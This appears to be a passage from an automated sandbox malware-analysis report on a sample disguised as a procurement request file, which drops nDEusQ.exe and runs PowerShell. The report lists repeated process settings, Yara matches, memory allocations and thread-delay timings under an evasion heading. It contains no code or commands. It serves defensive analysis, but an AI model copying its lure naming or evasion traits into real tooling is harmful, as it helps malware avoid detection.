                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: 10E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: 75F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: 85F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: 8790000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: 9790000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: 9AD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: AAD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: C10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeMemory allocated: 4960000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory allocated: 1670000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory allocated: 7BA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory allocated: 8BA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory allocated: 8D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory allocated: 9D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory allocated: A360000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory allocated: B360000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory allocated: 14F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory allocated: 3000000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMemory allocated: 2E10000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 599531Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 599158Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598994Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598875Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598765Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598656Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598547Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598437Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598328Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598219Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 598094Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597984Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597875Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597766Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597656Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeThread delayed: delay time: 597547Jump to behavior
